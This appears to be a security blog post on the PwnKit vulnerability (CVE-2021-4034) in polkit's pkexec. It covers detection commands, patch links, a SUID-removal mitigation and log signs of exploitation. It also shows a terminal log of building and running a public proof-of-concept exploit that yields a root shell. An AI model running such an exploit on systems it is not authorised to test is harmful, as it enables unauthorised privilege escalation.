CVE-2021-4034 - gimme root

Hell yeah! Finally, new category on 0ut3r Space! This is the first article in vulnerability category. I’ve been planning this for some time. I will describe shortly the most spectacular, popular and interesting vulnerabilities from perspective of blue and red teams, with some examples. Let start with first one. Quite fresh.

pwnkit

CVE-2021-4034 was discovered by Qualys Research Team. Why it is so special? Its origin has been tracked to the initial commit of pkexec, more than 12 years ago, so yeah all Polkit versions are affected :) The good news is that vulnerability is not remotely exploitable, but if you have access to the machine as any unprivileged user you can quickly and easily gain root privileges. One of the Zero Trust methodology says, act like the attacker is already inside. You can assume that some of the threat actors are already in your organization, and were just waiting for situation like this, to use this kind of vulnerability for privilege escalation. It has never been so easy, because Polkit (formerly PolicyKit) is a component installed by default in Linux distributions like Ubuntu, Debian, Fedora, and CentOS. Other Linux are likely vulnerable too.

Check if you are affected

If you do not have installed polkit you are safe. If you have, you are affected. Just check is it installed on your system.

On Debian based distros:

1
sudo apt list --installed | grep 'policykit\|polkit'

On RedHat based distros:

1
sudo rpm -qa | grep 'policykit\|polkit'

or

1
sudo yum list installed grep 'policykit\|polkit'

On Suse:

1
sudo zypper search -i polkit

if you are admin of Linux you know how to check it on your system.

Mitigations

Now most important part. Mitigations! You have two options.

First one is to patch it ASAP. Fortunately patches are already published for most of all versions of active Linux distributions.

You can check security bulletins for your Linux version (each have table with platform/release), for example:

RedHat - https://access.redhat.com/security/cve/CVE-2021-4034

Debian - https://security-tracker.debian.org/tracker/CVE-2021-4034

Ubuntu - https://ubuntu.com/security/CVE-2021-4034

SuSe - https://www.suse.com/security/cve/CVE-2021-4034.html

If there is no patch for your operating system, you have second option, remove the SUID-bit from pkexec as a temporary mitigation.

Check it:

1
2
$ ls -l /usr/bin/pkexec 
-rwsr-xr-x 1 root root 31032 May 26 2021 /usr/bin/pkexec

remove it:

1
sudo chmod 0755 /usr/bin/pkexec

But to be honest if there is no patch for your operating system it probably means you should update your system to the actively developed one.

Attack! I mean POC

Davide Berardi published exploit. In next few days there will be more and more exploits for this.

For now, if you would like to test it, just download it from GitHub. Compile using make command and run ./cve-2021-4034.

Example:

1
2
3
4
5
6
7
8
9
10
vagrant@ubuntu-impish:~/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
vagrant@ubuntu-impish:~/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
# exit

Easy peasy ;)

Signs of exploitation

It is possible to exploit this without leaving a trace, but you can check logs for (auth.log):

The value for the SHELL variable was not found the /etc/shells file

or

The value for environment variable […] contains suspicious content.

Additional info

Fun facts. Or just facts.

You may think what the heck happened, the CVE says it was from the last year. Yup! Qualys reported the security issue responsibly on November 18, 2021, but before they published tehnical details, they waited for a patch.

Official polkit repo: https://gitlab.freedesktop.org/polkit/polkit

Why is the vulnerability named “PwnKit”?

This is a pun intended on the name of the vulnerable application Polkit.

Another busy week for SOC in many companies. I hope that one member of our Discord channel finally rest on rescheduled holiday. (Best regards Liks) If not, just let that lazy IT admins to patch their shit and go rest :D